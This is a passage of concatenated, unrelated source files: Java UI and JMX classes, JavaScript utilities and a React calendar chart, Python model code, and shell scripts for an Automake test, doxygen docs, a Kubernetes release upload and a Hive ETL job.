    public AbstractPersistentPropertyPredicate(PersistentPropertyPath<T> persistentPropertyPath) {
        this.persistentPropertyPath = persistentPropertyPath;
    }

    /**
     * @return the full property path of this predicate
     */
    public final PersistentPropertyPath<T> getPropertyPath() {
        return persistentPropertyPath;
    }

    /**
     * @return the terminal property of the path
     */
    public final PersistentProperty getProperty() {
        return persistentPropertyPath.getProperty();
    }
}
|
<reponame>craigbuckler/nodequiz<gh_stars>0
// utility functions
// Remove every child of a DOM element, last-to-first, until none remain.
export function clear( node ) {
  for ( let child = node.lastChild; child != null; child = node.lastChild ) {
    node.removeChild( child );
  }
}
|
<filename>infrastructure/platform-api-gateway/src/main/resources/static/admin/scripts/portfolio.js
// Admin portfolio page: exposes Portfolio.init(), which initialises the
// jQuery MixItUp plugin on the ".mix-grid" container.
var Portfolio = (function () {
    return {
        init: function () {
            $(".mix-grid").mixitup();
        }
    };
})();
import numpy as np
from core.net_errors import NetConfigIndefined, IncorrectFactorValue
def initialize(net_object, factor=0.01):
    """Populate ``net_object.net`` with one layer per consecutive pair in
    ``net_object.config``.

    Each layer is a dict with:
      'w': uniform random weights in [-factor, factor], shaped
           (neurons, previous_neurons + 1) — the +1 column is for the bias;
      'o': zero-initialised output vector of length ``neurons``.

    Raises NetConfigIndefined when no config is set, and IncorrectFactorValue
    when ``abs(factor) > 1``.
    """
    if net_object.config is None:
        raise NetConfigIndefined()
    if abs(factor) > 1:
        raise IncorrectFactorValue()

    layer_sizes = net_object.config
    net_object.net = []
    for layer in range(1, len(layer_sizes)):
        weights = np.random.uniform(
            -factor, factor, (layer_sizes[layer], layer_sizes[layer - 1] + 1)
        )
        outputs = np.zeros(layer_sizes[layer])
        net_object.net.append({'w': weights, 'o': outputs})
|
package io.opensphere.core.util.swing;
import java.awt.Color;
import java.awt.Component;
import java.awt.Graphics;
import javax.swing.border.EtchedBorder;
/**
* The Class DynamicEtchedBorder.
*/
/**
 * An etched border that leaves a gap in its top edge for an embedded control
 * component (see ComponentTitledBorder) and whose highlight state can be
 * toggled at runtime.
 */
public class DynamicEtchedBorder extends EtchedBorder
{
    /** The Constant serialVersionUID. */
    private static final long serialVersionUID = 1L;

    /** Color used for the highlight when the border is highlighted. */
    private Color myBorderColor = Color.LIGHT_GRAY;

    /** Width of the control component embedded in the top edge (0 = none). */
    private final int myControlComponentWidth;

    /**
     * Instantiates a new dynamic etched border.
     *
     * @param borderColor the border color (falls back to light gray when null)
     * @param comp the control component whose preferred width is reserved in
     *            the top edge
     */
    public DynamicEtchedBorder(Color borderColor, Component comp)
    {
        super();
        if (borderColor != null)
        {
            myBorderColor = borderColor;
        }
        myControlComponentWidth = comp.getPreferredSize().width;
    }

    @Override
    public void paintBorder(Component c, Graphics g, int x, int y, int width, int height)
    {
        int w = width;
        int h = height;
        g.translate(x, y);

        // First pass: shadow (or highlight, when raised).
        g.setColor(etchType == LOWERED ? getShadowColor(c) : getHighlightColor(c));
        if (myControlComponentWidth == 0)
        {
            g.drawRect(0, 0, w - 2, h - 2);
        }
        else
        {
            // Left side
            g.drawLine(0, h - 4, 0, 0);
            // Top side (interrupted by the gap for the control component)
            g.drawLine(0, 0, ComponentTitledBorder.LEFT_OFFSET - 1, 0);
            g.drawLine(myControlComponentWidth + ComponentTitledBorder.LEFT_OFFSET + 2, 0, w - 3, 0);
            // Bottom side
            g.drawLine(0, h - 2, w - 2, h - 2);
            // Right side
            g.drawLine(w - 2, h - 2, w - 2, 0);
        }

        // Second pass: the complementary color, offset by one pixel, creates
        // the etched effect.
        g.setColor(etchType == LOWERED ? getHighlightColor(c) : getShadowColor(c));
        if (myControlComponentWidth == 0)
        {
            g.drawLine(1, h - 3, 1, 1);
            g.drawLine(1, 1, w - 3, 1);
            g.drawLine(0, h - 1, w - 1, h - 1);
            g.drawLine(w - 1, h - 1, w - 1, 0);
        }
        else
        {
            // Left side
            g.drawLine(1, h - 3, 1, 1);
            // Top side (interrupted by the gap for the control component)
            g.drawLine(1, 1, ComponentTitledBorder.LEFT_OFFSET - 1, 1);
            g.drawLine(myControlComponentWidth + ComponentTitledBorder.LEFT_OFFSET + 2, 1, w - 3, 1);
            // Bottom side
            g.drawLine(0, h - 1, w - 1, h - 1);
            // Right side
            g.drawLine(w - 1, h - 1, w - 1, 0);
        }

        g.translate(-x, -y);
    }

    /**
     * Sets the border highlight.
     *
     * @param highlighted on/off switch for the highlighting
     */
    public void setHighlighted(boolean highlighted)
    {
        // Use the inherited EtchedBorder constants (RAISED == 0, LOWERED == 1)
        // instead of the magic numbers used previously.
        etchType = highlighted ? RAISED : LOWERED;
        highlight = highlighted ? myBorderColor : null;
    }
}
|
#! /bin/sh
# Copyright (C) 2001-2017 Free Software Foundation, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

# Another test related to PR 279.
# Multiple DEPENDENCIES on conditionals.
# Please keep this in sync with sister test 'pr279.sh'.
#
# == Report ==
# When defining xxx_LDADD and xxx_DEPENDENCIES variables where the
# xxx_LDADD one contains values set in conditionals, automake will
# fail with messages like:
#   foo_DEPENDENCIES was already defined in condition TRUE, ...

. test-init.sh

# Minimal configure.ac with one (always-false) conditional.
cat >> configure.ac << 'END'
AC_PROG_CC
AM_CONDITIONAL([FOOTEST], [false])
AC_OUTPUT
END

# foo_LDADD is set differently in each branch of the conditional; automake
# must derive a per-condition foo_DEPENDENCIES instead of erroring out.
cat > Makefile.am << 'END'
if FOOTEST
foo_LDADD = zardoz
else
foo_LDADD = maude
endif
bin_PROGRAMS = foo
END

$ACLOCAL
$AUTOMAKE

# The generated Makefile.in must contain one foo_DEPENDENCIES definition
# per branch of the conditional (this is the PR 279 regression check).
grep '^@FOOTEST_TRUE@foo_DEPENDENCIES *= *zardoz$' Makefile.in
grep '^@FOOTEST_FALSE@foo_DEPENDENCIES *= *maude$' Makefile.in

:
|
<reponame>congleetea/fuse<filename>fuse_models/include/fuse_models/parameters/acceleration_2d_params.h<gh_stars>0
/*
* Software License Agreement (BSD License)
*
* Copyright (c) 2018, Locus Robotics
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution.
* * Neither the name of the copyright holder nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef FUSE_MODELS_PARAMETERS_ACCELERATION_2D_PARAMS_H
#define FUSE_MODELS_PARAMETERS_ACCELERATION_2D_PARAMS_H
#include <fuse_variables/acceleration_linear_2d_stamped.h>
#include <fuse_models/parameters/parameter_base.h>
#include <ros/node_handle.h>
#include <string>
#include <vector>
namespace fuse_models
{
namespace parameters
{
/**
 * @brief Defines the set of parameters required by the Acceleration2D class
 */
struct Acceleration2DParams : public ParameterBase
{
public:
  /**
   * @brief Method for loading parameter values from ROS.
   *
   * @param[in] nh - The ROS node handle with which to load parameters
   */
  void loadFromROS(const ros::NodeHandle& nh) final
  {
    // Which dimensions of the 2D linear acceleration variable to fuse.
    indices = loadSensorConfig<fuse_variables::AccelerationLinear2DStamped>(nh, "dimensions");
    nh.getParam("queue_size", queue_size);
    // "topic" and "target_frame" have no sensible defaults, so both are
    // required parameters (getParamRequired enforces their presence).
    getParamRequired(nh, "topic", topic);
    getParamRequired(nh, "target_frame", target_frame);
  }

  int queue_size { 10 };        //!< Subscriber queue size (default 10)
  std::string topic {};         //!< Topic to subscribe to (required)
  std::string target_frame {};  //!< Target frame id (required); presumably the frame measurements are transformed into — confirm against the sensor model
  std::vector<size_t> indices;  //!< Indices of the acceleration dimensions selected by "dimensions"
};
} // namespace parameters
} // namespace fuse_models
#endif // FUSE_MODELS_PARAMETERS_ACCELERATION_2D_PARAMS_H
|
// Sample inputs shared by the prefix-sum demos below.
const arr = [ 1, 1, 5, 2, 6, 10 ];
// BUG FIX: arr1 is never reassigned, so `const` is the correct declaration
// (was `let`).
const arr1 = [ 1, 7, 12, 6, 5, 10 ];
//--------------------------------------------------
// Compute the running (prefix) sums of an array: output[i] is the sum of
// the first i + 1 elements. Returns a new array; the input is not mutated.
const partialSum = ( values ) => {
  const sums = [];
  let runningTotal = 0;
  for ( const value of values ) {
    runningTotal += value;
    sums.push( runningTotal );
  }
  return sums;
};
// Demo: run partialSum on both sample arrays and print the results.
console.log( '------------------------------------------------partialSum------------------------------------------------' )
console.log( ' partialSum( arr )=[ 1, 1, 5, 2, 6, 10 ]:   ', partialSum( arr ) );
console.log( ' partialSum( arr1 )=[ 1, 7, 12, 6, 5, 10 ]:  ', partialSum( arr1 ) );
console.log( '------------------------------------------------partialSum------------------------------------------------' )
/*
Expected transcript:
------------------------------------------------partialSum------------------------------------------------
 partialSum( arr )=[ 1, 1, 5, 2, 6, 10 ]:    [ 1, 2, 7, 9, 15, 25 ]
 partialSum( arr1 )=[ 1, 7, 12, 6, 5, 10 ]:   [ 1, 8, 20, 26, 31, 41 ]
------------------------------------------------partialSum------------------------------------------------
*/
// Prefix sums via reduce.
// BUG FIX (this was the "NOT WORKING AS EXPECTED" version): reduce was
// called without an initial value, so the first element was consumed as the
// seed accumulator and its partial sum was never pushed — the output was
// missing the first entry, and an empty input threw a TypeError. Passing 0
// as the initial accumulator fixes both.
const partSum = ( array ) => {
  const sums = [];
  array.reduce( ( runningTotal, element ) => {
    const sum = runningTotal + element;
    sums.push( sum );
    return sum;
  }, 0 );
  return sums;
};
// Demo: run partSum on both sample arrays and print the results.
console.log( '------------------------------------------------partSum------------------------------------------------' )
console.log( 'partSum(arr)=[ 1, 1, 5, 2, 6, 10 ]:   ', partSum( arr ) );
console.log( 'partSum(arr1)=[ 1, 7, 12, 6, 5, 10 ]:  ', partSum( arr1 ) );
console.log( '------------------------------------------------partSum------------------------------------------------' )
/*
NOTE: this transcript was captured while partSum called reduce WITHOUT an
initial value, which silently drops the first partial sum (compare with the
partialSum transcript above):
------------------------------------------------partSum------------------------------------------------
partSum(arr)=[ 1, 1, 5, 2, 6, 10 ]:    [ 2, 7, 9, 15, 25 ]
partSum(arr1)=[ 1, 7, 12, 6, 5, 10 ]:   [ 8, 20, 26, 31, 41 ]
------------------------------------------------partSum------------------------------------------------
*/
//--------------------------------------------------------------
//! -----------------------------------------------------------------------------------------------------------------------------------------//
/*
Full captured session (same caveat as above for the partSum section; the
rPartSumsArr function referenced below is not part of this file):
------------------------------------------------partialSum------------------------------------------------
 partialSum( arr )=[ 1, 1, 5, 2, 6, 10 ]:    [ 1, 2, 7, 9, 15, 25 ]
 partialSum( arr1 )=[ 1, 7, 12, 6, 5, 10 ]:   [ 1, 8, 20, 26, 31, 41 ]
------------------------------------------------partialSum------------------------------------------------
------------------------------------------------partSum------------------------------------------------
partSum(arr)=[ 1, 1, 5, 2, 6, 10 ]:    [ 2, 7, 9, 15, 25 ]
partSum(arr1)=[ 1, 7, 12, 6, 5, 10 ]:   [ 8, 20, 26, 31, 41 ]
------------------------------------------------partSum------------------------------------------------
------------------------------------------------rPartSumArr------------------------------------------------
rPartSumsArr(arr)=[ 1, 1, 5, 2, 6, 10 ]:    [ 10, 16, 18, 23, 24, 25 ]
rPartSumsArr(arr1)=[ 1, 7, 12, 6, 5, 10 ]:   [ 10, 15, 21, 33, 40, 41 ]
------------------------------------------------rPartSumArr------------------------------------------------
*/
<gh_stars>10-100
package chylex.hee.system.abstractions.damage.source;
import net.minecraft.util.DamageSource;
/**
 * Simple named damage source that is absolute and unblockable, and whose
 * damage does not scale with game difficulty.
 */
public class DamagedBy extends DamageSource{
	/**
	 * @param sourceName internal name identifying this damage source
	 */
	public DamagedBy(String sourceName){
		super(sourceName);
	}

	// Absolute damage — per the DamageSource contract this presumably bypasses
	// armor/potion reduction; confirm against the Minecraft version in use.
	@Override
	public boolean isDamageAbsolute(){
		return true;
	}

	// Cannot be blocked by the target.
	@Override
	public boolean isUnblockable(){
		return true;
	}

	// Damage amount is the same on every difficulty setting.
	@Override
	public boolean isDifficultyScaled(){
		return false;
	}
}
|
#!/usr/bin/env bash
# Run with argument `--skip-checks` to skip checks for clean build and removing install dir.

# exit on any error
set -e

# This script will
# 1. build and install the source,
# 2. run doxygen and create html and xml docs,
# 3. run script to generate markdown from xml

echo "Generating docs"
command -v doxygen >/dev/null 2>&1 || { echo "ERROR: 'doxygen' is required and was not found!"; exit 1; }

# Get current directory of script.
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"

skip_checks=false
# Use [[ ... && ... ]] instead of the deprecated, non-portable `[ ... -a ... ]`.
if [[ "$#" -eq 1 && "$1" == "--skip-checks" ]]; then
    skip_checks=true
fi

BUILD_DIR="${SCRIPT_DIR}/docs"
INSTALL_DIR="${BUILD_DIR}/install"

if [ "$skip_checks" = false ]; then
    # Quoted so paths containing spaces do not break the test.
    if [ -d "${BUILD_DIR}" ] ; then
        printf "\"${BUILD_DIR}\" already exists! Aborting...\n"
        exit 1
    fi
fi

# Build and install locally.
cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX="${INSTALL_DIR}" -B"${BUILD_DIR}" -H.;
make -C"${BUILD_DIR}" install -j4;

return_result=0

# Doxygen likes to run where the source is (because INPUT in .doxygen is empty),
# so we cd there.
pushd "${INSTALL_DIR}/include/mavsdk"

# If any warnings are thrown, we should not flag this as a success.
doxygen_output_file=".doxygen_output.tmp"
doxygen "${SCRIPT_DIR}/.doxygen" &> "$doxygen_output_file"
cat "$doxygen_output_file"
if grep "warning" "$doxygen_output_file" | grep -v "ignoring unsupported tag"
then
    return_result=1
    echo "Please check doxygen warnings."
fi

# TODO (Jonas): is there a reason for generating markdown if doxygen failed above?
"${SCRIPT_DIR}/generate_markdown_from_doxygen_xml.py" "${INSTALL_DIR}/docs" "${INSTALL_DIR}/docs"

popd

exit $return_result
|
<reponame>VOLTTRON/volttron-AIRCx-visualization<gh_stars>1-10
// Copyright (c) 2020, Battelle Memorial Institute
// All rights reserved.
// 1. Battelle Memorial Institute (hereinafter Battelle) hereby grants
// permission to any person or entity lawfully obtaining a copy of this
// software and associated documentation files (hereinafter "the Software")
// to redistribute and use the Software in source and binary forms, with or
// without modification. Such person or entity may use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and
// may permit others to do so, subject to the following conditions:
// - Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimers.
// - Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// - Other than as used herein, neither the name Battelle Memorial Institute
// or Battelle may be used in any form whatsoever without the express
// written consent of Battelle.
// 2. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL BATTELLE OR CONTRIBUTORS BE LIABLE FOR
// ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
// LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
// OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
// DAMAGE.
// The views and conclusions contained in the software and documentation are those
// of the authors and should not be interpreted as representing official policies,
// either expressed or implied, of the FreeBSD Project.
// This material was prepared as an account of work sponsored by an agency of the
// United States Government. Neither the United States Government nor the United
// States Department of Energy, nor Battelle, nor any of their employees, nor any
// jurisdiction or organization that has cooperated in the development of these
// materials, makes any warranty, express or implied, or assumes any legal
// liability or responsibility for the accuracy, completeness, or usefulness or
// any information, apparatus, product, software, or process disclosed, or
// represents that its use would not infringe privately owned rights.
// Reference herein to any specific commercial product, process, or service by
// trade name, trademark, manufacturer, or otherwise does not necessarily
// constitute or imply its endorsement, recommendation, or favoring by the
// United States Government or any agency thereof, or Battelle Memorial Institute.
// The views and opinions of authors expressed herein do not necessarily state or
// reflect those of the United States Government or any agency thereof.
// PACIFIC NORTHWEST NATIONAL LABORATORY
// operated by
// BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
// under Contract DE-AC05-76RL01830
import { ButtonBase, Paper, Tooltip, Typography } from "@material-ui/core";
import { withStyles } from "@material-ui/core/styles";
import clsx from "clsx";
import filters from "constants/filters";
import groups from "constants/groups";
import { white } from "constants/palette";
import {
fetchDetailed,
selectDetailed,
selectDetailedBusy,
selectDetailedRequest,
selectSources,
} from "controllers/data/action";
import _ from "lodash";
import moment from "moment";
import React from "react";
import { connect } from "react-redux";
import Popup from "./Popup";
import styles from "./styles";
class Graph extends React.Component {
constructor(props) {
super(props);
const { form } = props;
const group = groups.parse(_.get(form, "group", "day"));
const time = moment(_.get(form, "date"));
const noData = filters.parse("no-data");
const outsideRange = filters.parse("outside-range");
const start = moment(props.start);
const end = moment(props.end);
const range = {
start: start.clone(),
end: end.clone(),
};
switch (group.name) {
case "month":
range.start = moment.max(
range.start,
time
.clone()
.startOf("month")
.startOf("day")
);
range.end = moment.min(
range.end,
time
.clone()
.endOf("month")
.endOf("day")
);
break;
case "week":
range.start = moment.max(
range.start,
time
.clone()
.startOf("week")
.startOf("day")
);
range.end = moment.min(
range.end,
time
.clone()
.endOf("week")
.endOf("day")
);
break;
case "day":
range.start = time.clone().startOf("day");
range.end = time.clone().endOf("day");
break;
default:
// no need to handle all cases
}
const pad = moment.min(
end
.clone()
.date(1)
.subtract(11, "month"),
end
.clone()
.subtract(1, "year")
.add(1, "day")
);
const months = [
{
name: pad.format("MMM"),
label: pad.format("MMM").slice(0, 1),
month: pad.month(),
year: pad.year(),
tooltip: pad.format("MMMM YYYY"),
},
];
const base = [];
while (pad.isBefore(end)) {
const month = months[months.length - 1];
base.push({
path: [`${month.year}`, `${month.month}`, `${pad.date()}`],
x: months.length,
y: pad.date(),
size: 10,
color: pad.isBefore(start) ? outsideRange.color : noData.color,
date: pad.isBefore(start) ? null : pad.clone(),
selected: pad.isBetween(range.start, range.end, "hour", true),
tooltip: pad.format("MMMM Do YYYY"),
});
pad.add(1, "day");
if (months[months.length - 1].month !== pad.month()) {
months.push({
name: pad.format("MMM"),
label: pad.format("MMM").slice(0, 1),
month: pad.month(),
year: pad.year(),
tooltip: pad.format("MMMM YYYY"),
});
}
}
const month = months[months.length - 1];
base.push({
path: [`${month.year}`, `${month.month}`, `${pad.date()}`],
x: months.length,
y: pad.date(),
size: 10,
color: pad.isBefore(start) ? outsideRange.color : noData.color,
date: pad.clone(),
selected: pad.isBetween(range.start, range.end, "hour", true),
tooltip: pad.format("MMMM Do YYYY"),
});
this.state = {
start: moment(props.start),
end: moment(props.end),
months: months,
base: base,
temp: [],
show: null,
};
}
isPrevious = () => {
const { show, start } = this.state;
if (show) {
return !show.date.isSame(start, "day");
}
};
isNext = () => {
const { show, end } = this.state;
if (show) {
return !show.date.isSame(end, "day");
}
};
handleValueClick = (value) => {
const { current, sources } = this.props;
if (value.date) {
const { site, building, device, diagnostic } = current;
const topic = Object.values(
_.get(sources, [diagnostic, site, building, device], {})
);
this.setState({ show: value });
this.props.fetchDetailed(
_.merge({}, current, {
start: value.date
.clone()
.startOf("day")
.format(),
end: value.date
.clone()
.endOf("day")
.format(),
topic: topic,
})
);
}
};
handleValuePrevious = () => {
const { current, sources } = this.props;
const { base, months, show } = this.state;
if (this.isPrevious()) {
const { site, building, device, diagnostic } = current;
const topic = Object.values(
_.get(sources, [diagnostic, site, building, device], {})
);
const date = show.date.clone().subtract("day", 1);
const mark = _.find(base, {
x: _.findIndex(months, { month: date.month(), year: date.year() }) + 1,
y: date.date(),
});
this.setState({ show: mark });
this.props.fetchDetailed(
_.merge({}, current, {
start: date
.clone()
.startOf("day")
.format(),
end: date
.clone()
.endOf("day")
.format(),
topic: topic,
})
);
}
};
handleValueNext = () => {
const { current, sources } = this.props;
const { base, months, show } = this.state;
if (this.isNext()) {
const { site, building, device, diagnostic } = current;
const topic = Object.values(
_.get(sources, [diagnostic, site, building, device], {})
);
const date = show.date.clone().add("day", 1);
const mark = _.find(base, {
x: _.findIndex(months, { month: date.month(), year: date.year() }) + 1,
y: date.date(),
});
this.setState({ show: mark });
this.props.fetchDetailed(
_.merge({}, current, {
start: date
.clone()
.startOf("day")
.format(),
end: date
.clone()
.endOf("day")
.format(),
topic: topic,
})
);
}
};
handleClose = () => {
this.setState({ show: null });
};
renderHeader() {
const { classes } = this.props;
const { months } = this.state;
return (
<React.Fragment>
<div className={classes.monthsTitle}>
<span className={classes.month}>
<strong>Month</strong>
</span>
</div>
<div className={classes.months} style={{ width: months.length * 19 }}>
{months.map((m) => (
<Tooltip
key={`tooltip-${m.year}-${m.month}`}
title={m.tooltip}
placement="top"
>
<span
key={`month-${m.year}-${m.month}`}
className={classes.month}
>
<strong>{m.label}</strong>
</span>
</Tooltip>
))}
</div>
</React.Fragment>
);
}
renderChart() {
const { classes, data, form } = this.props;
const { base, months } = this.state;
const likely = filters.parse("likely");
const sensitivity = _.get(form, "sensitivity", "normal");
const filter = filters.parse(form.filter);
const outsideRange = filters.parse("outside-range");
const marks = base.map((item) => {
let temp = {};
if (item.color !== outsideRange.color) {
const values = Object.values(_.get(data, item.path, {}))
.reduce((p, v) => p.concat(v), [])
.filter((v) => {
const t = filter.isType(v[sensitivity]);
return t;
})
.map((v) => ({
filter: filters.getType(v[sensitivity]),
value: v[sensitivity],
}));
if (filter === likely) {
const errors = _.filter(values, { filter: filters.parse("fault") })
.length;
const passed = _.filter(values, { filter: filters.parse("okay") })
.length;
const aggregate = filters.aggregate(errors, passed);
temp = { color: aggregate.color, value: 0 };
} else {
for (let index = 0; index < filters.values.length; index++) {
const filter = filters.values[index];
const value = _.find(values, { filter });
if (value) {
temp = { color: filter.color, value: value };
break;
}
}
}
}
return _.merge({}, item, temp);
});
return (
<div className={classes.chart} style={{ width: months.length * 19 + 4 }}>
{marks.map((mark, index) => (
<React.Fragment key={`fragment-${mark.x}-${mark.y}`}>
{mark.selected && (
<div
key={`selected-${mark.x}-${mark.y}`}
className={classes.selected}
style={{
left: mark.x * 19 - 20,
top: mark.y * 21 - 20,
height:
_.get(marks, [index + 1, "selected"], false) &&
_.get(marks, [index + 1, "path", "1"]) === mark.path[1]
? "44px"
: "24px",
}}
/>
)}
<Tooltip
key={`tooltip-${mark.tooltip}`}
title={mark.tooltip}
placement="top"
>
<ButtonBase
key={`mark-${mark.x}-${mark.y}`}
className={clsx(
classes.mark,
Boolean(mark.date) && classes.hover
)}
style={{
left: mark.x * 19 - 14,
top: mark.y * 21 - 14,
background: mark.color,
}}
onClick={() => this.handleValueClick(mark)}
/>
</Tooltip>
</React.Fragment>
))}
</div>
);
}
renderTitle() {
const { classes, label } = this.props;
const { months } = this.state;
return (
<div className={classes.footer} style={{ width: months.length * 19 + 4 }}>
<Typography className={classes.footerLabel} variant="body1">
<strong>{_.replace(label, / Dx$/i, "")}</strong>
</Typography>
</div>
);
}
renderFooter() {
const { classes } = this.props;
return <div className={classes.footer} style={{ height: "25px" }} />;
}
render() {
const {
classes,
form,
current,
data,
detailed,
busy,
request,
label,
} = this.props;
const { show } = this.state;
return (
<Paper className={classes.paper} color={white} elevation={3}>
{this.renderTitle()}
{this.renderHeader()}
{this.renderChart()}
{this.renderFooter()}
{show && (
<Popup
form={form}
current={current}
path={_.concat([label], show.path)}
data={_.merge({}, show, {
diagnostic: _.get(data, show.path, {}),
detailed: detailed,
busy: busy,
})}
request={request}
onClose={this.handleClose}
isNext={this.isNext()}
isPrevious={this.isPrevious()}
onNext={this.handleValueNext}
onPrevious={this.handleValuePrevious}
/>
)}
</Paper>
);
}
}
// Redux wiring: expose detailed-data state/selectors and the fetchDetailed
// action to <Graph>, and apply the JSS styles.
const mapStateToProps = (state) => ({
  detailed: selectDetailed(state),
  busy: selectDetailedBusy(state),
  request: selectDetailedRequest(state),
  sources: selectSources(state),
});
const mapActionToProps = { fetchDetailed };
export default connect(
  mapStateToProps,
  mapActionToProps
)(withStyles(styles)(Graph));
|
from pydantic import BaseModel, Field
class HealthModel(BaseModel):
    """Response body for the service health-check endpoint."""
    # Overall service status, e.g. 'OK'.
    status: str = Field(...)
    # Running application version, e.g. '0.1.0'.
    version: str = Field(...)
    # Result of the database connectivity check, e.g. 'pong'.
    db_ping: str = Field(...)

    class Config:
        # Pydantic v1 settings: allow population by field name (aliases),
        # permit arbitrary (non-validated) types, and attach an example
        # to the generated OpenAPI schema.
        allow_population_by_field_name = True
        arbitrary_types_allowed = True
        schema_extra = {
            'example': {
                'status': 'OK',
                'version': '0.1.0',
                'db_ping': 'pong',
            }
        }
package com.darian.springbootjmx.dynamicBean;
import javax.management.DynamicMBean;
import javax.management.MBeanServer;
import javax.management.ObjectName;
import javax.management.StandardMBean;
import java.lang.management.ManagementFactory;
/**
 * Demo server that registers a {@link StandardMBean} wrapping a Data
 * implementation on the platform MBean server, then blocks forever so the
 * bean stays visible to JMX clients (e.g. JConsole).
 */
public class DynamicBeanServer {
    public static void main(String[] args) throws Exception {
        MBeanServer mBeanServer = ManagementFactory.getPlatformMBeanServer();
        // JMX object name: domain plus a type key identifying this bean.
        ObjectName objectName = new ObjectName("com.darian.springbootjmx.dynamicBean:type=Data");
        Data data = new DefaultData();
        // StandardMBean adapts the Data interface into a DynamicMBean.
        DynamicMBean dynamicMBean = new StandardMBean(data, Data.class);
        mBeanServer.registerMBean(dynamicMBean, objectName);
        System.out.println("DynamicBeanServer start ......");
        // Keep the JVM alive so the MBean remains registered.
        Thread.sleep(Long.MAX_VALUE);
    }
}
|
#!/bin/bash
# Copyright 2014 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Pushes an official release to our official release location

set -o errexit
set -o nounset
set -o pipefail

# First positional argument: the version to release (e.g. v1.2.3).
# `${1-}` defaults to empty so `nounset` does not abort before validation.
KUBE_RELEASE_VERSION=${1-}
VERSION_REGEX="^v(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)$"
[[ ${KUBE_RELEASE_VERSION} =~ $VERSION_REGEX ]] || {
  echo "!!! You must specify the version you are releasing in the form of '$VERSION_REGEX'" >&2
  exit 1
}

# GCS upload configuration consumed by build/common.sh: publish a public,
# cacheable release under release/<version> and update release/latest.txt.
KUBE_GCS_NO_CACHING=n
KUBE_GCS_MAKE_PUBLIC=y
KUBE_GCS_UPLOAD_RELEASE=y
KUBE_GCS_RELEASE_BUCKET=kubernetes-release
KUBE_GCS_RELEASE_PREFIX=release/${KUBE_RELEASE_VERSION}
KUBE_GCS_LATEST_FILE="release/latest.txt"
KUBE_GCS_LATEST_CONTENTS=${KUBE_RELEASE_VERSION}

KUBE_ROOT=$(dirname "${BASH_SOURCE}")/..
source "$KUBE_ROOT/build/common.sh"

kube::release::gcs::release
kube::release::gcs::publish_latest_official
|
#!/bin/sh
# ETL job: compute the per-major "number of training bases" metric
# (实训基地数量), load it into Hive, and export it to MySQL via sqoop.

# Quote dirname/"$0" so paths containing spaces work, and abort if cd fails.
cd "$(dirname "$0")" || exit 1
source ./../config.sh
exec_dir major_number_of_training_bases

# Hive/MySQL locations and metric metadata.
HIVE_DB=assurance
HIVE_TABLE=major_number_of_training_bases
TARGET_TABLE=im_quality_major_data_info
DATA_NAME=实训基地数量
DATA_NO=ZY_SXJDSL
# Recreate the external Hive table holding the metric: remove any stale
